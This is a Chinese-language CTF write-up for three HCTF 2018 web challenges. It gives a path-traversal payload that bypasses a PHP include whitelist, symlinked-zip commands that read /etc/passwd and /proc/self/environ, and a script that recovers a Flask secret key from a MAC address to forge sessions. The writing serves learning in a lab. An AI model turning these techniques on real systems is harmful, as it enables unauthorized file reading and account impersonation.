[HCTF 2018]WarmUp
来了,这道题的原理我感觉我写的应该是比较明白的了!
访问网页源码:/source.php
php
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>看到hint.php访问可知flag not here, and flag in ffffllllaaaagggg,但是没有说是哪个目录!但至少我们已经知道了文件名!
php
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
}一个文件包含,主要是绕过checkFile的检测!我们肯定利用的是?来绕过!也就是说?file=hint.php?这个是可以绕过的,但是我们要包含ffffllllaaaagggg这个,那这个hint.php?怎么处理呢?答案是把它当作一个目录然后实现目录穿越!
/source.php?file=hint.php?/../../../../ffffllllaaaagggg
完整的就是/var/www/html/hint.php?/../../../../ffffllllaaaagggg
[HCTF 2018]admin
<!-- you are not admin -->说不是admin,看一下cookie。md没有,哦原来是还没注册,怎么可能会有呢!
看到session了,那么就是flask框架了!
破解session
密钥为ckj123,这脚本事情真多,true要改成大写True!
[HCTF 2018]Hideandseek
很舒服的一题!
不用注册,可以直接登录,那么应该是没有进数据库的,尝试admin登录不行,肯定是哪里做了校验,不然管理员自己怎么登入?先登入,然后查看cookie,好样的session写在cookie里flask框架!但是不知道secret_key!
提示上传zip文件
读出来文件里面的内容,那么我们可不可以用它进行任意文件读取呢?题目提示了软链接,那么好我们打个马子看看!(长城杯第二题)很遗憾失败了,不知道为啥!那就老实的先看看能不能读文件吧!
ln -s /etc/passwd slink
zip --symlink a.zip slink
然后上传a.zip 成功读取
不知道文件名怎么办,读环境变量呗!/proc/self/environ
XML
HOSTNAME=out
SHLVL=1
HOME=/root
LANG=C.UTF-8
PWD=/app
PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
STATIC_PATH=/app/static
STATIC_URL=/static
STATIC_INDEX=0
FLAG=not_flag
PYTHONPATH=/app
PYTHON_VERSION=3.6.8
PYTHON_PIP_VERSION=19.1.1
GPG_KEY=0D96DF4D4110E5C43FBFB17F2D347EA6AA65421D
NGINX_VERSION=1.15.8-1~stretch
NJS_VERSION=1.15.8.0.2.7-1~stretch
NGINX_WORKER_PROCESSES=1
NGINX_MAX_UPLOAD=0
LISTEN_PORT=80
UWSGI_INI=/app/uwsgi.ini
UWSGI_PROCESSES=16
UWSGI_CHEAPER=2
WERKZEUG_RUN_MAIN=true
WERKZEUG_SERVER_FD=3
KUBERNETES_SERVICE_HOST=10.240.0.1
KUBERNETES_SERVICE_PORT=443
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT=tcp://10.240.0.1:443
KUBERNETES_PORT_443_TCP=tcp://10.240.0.1:443
KUBERNETES_PORT_443_TCP_ADDR=10.240.0.1
KUBERNETES_PORT_443_TCP_PORT=443
KUBERNETES_PORT_443_TCP_PROTO=tcp
_=/usr/local/bin/pythonUWSGI_INI=/app/uwsgi.ini这个uwsgi服务器的配置文件,其中可能包含有源码路径,依旧软链接读取!
XML
[uwsgi]
module = main # 从main.py文件加载应用
callable = app # 应用对象名为'app'
logto = /tmp/hard_t0_guess_n9p2i5a6d1s_uwsgi.log有点bug这道题,源码并不在/app/main.py里面,而是在/app/hard_t0_guess_n9f5a95b5ku9fg/hard_t0_guess_also_df45v48ytj9_main.py
python
# -*- coding: utf-8 -*-
from flask import Flask,session,render_template,redirect, url_for, escape, request,Response
import uuid
import base64
import random
import flag
from werkzeug.utils import secure_filename
import os
random.seed(uuid.getnode())
app = Flask(__name__)
app.config['SECRET_KEY'] = str(random.random()*100)
app.config['UPLOAD_FOLDER'] = './uploads'
app.config['MAX_CONTENT_LENGTH'] = 100 * 1024
ALLOWED_EXTENSIONS = set(['zip'])
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/', methods=['GET'])
def index():
error = request.args.get('error', '')
if(error == '1'):
session.pop('username', None)
return render_template('index.html', forbidden=1)
if 'username' in session:
return render_template('index.html', user=session['username'], flag=flag.flag)
else:
return render_template('index.html')
@app.route('/login', methods=['POST'])
def login():
username=request.form['username']
password=request.form['password']
if request.method == 'POST' and username != '' and password != '':
if(username == 'admin'):
return redirect(url_for('index',error=1))
session['username'] = username
return redirect(url_for('index'))
@app.route('/logout', methods=['GET'])
def logout():
session.pop('username', None)
return redirect(url_for('index'))
@app.route('/upload', methods=['POST'])
def upload_file():
if 'the_file' not in request.files:
return redirect(url_for('index'))
file = request.files['the_file']
if file.filename == '':
return redirect(url_for('index'))
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file_save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
if(os.path.exists(file_save_path)):
return 'This file already exists'
file.save(file_save_path)
else:
return 'This file is not a zipfile'
try:
extract_path = file_save_path + '_'
os.system('unzip -n ' + file_save_path + ' -d '+ extract_path)
read_obj = os.popen('cat ' + extract_path + '/*')
file = read_obj.read()
read_obj.close()
os.system('rm -rf ' + extract_path)
except Exception as e:
file = None
os.remove(file_save_path)
if(file != None):
if(file.find(base64.b64decode('aGN0Zg==').decode('utf-8')) != -1):
return redirect(url_for('index', error=1))
return Response(file)
if __name__ == '__main__':
#app.run(debug=True)
app.run(host='0.0.0.0', debug=True, port=10008)secret_key部分
python
random.seed(uuid.getnode())
app = Flask(__name__)
app.config['SECRET_KEY'] = str(random.random()*100)
#getnode()获取计算机的硬件地址即 MAC 地址,文件位置/sys/class/net/eth0/address
读取为:fa:be:8b:45:ea:f4由10个16进制组成需要转化成10进制exp
python
import random
mac = int('fabe8b45eaf4 ',16)
random.seed(mac)
skey = str(random.random()*100)
print(skey)拿到secret_key,/路由下session伪造即可!
分析一下源码部分uzip的命令参考
python
extract_path = file_save_path + '_'
os.system('unzip -n ' + file_save_path + ' -d '+ extract_path)
read_obj = os.popen('cat ' + extract_path + '/*')
file = read_obj.read()
read_obj.close()
os.system('rm -rf ' + extract_path)可以看到任意文件读取是因为cat,然后之所以马子打不了是因为cat之后文件就被删了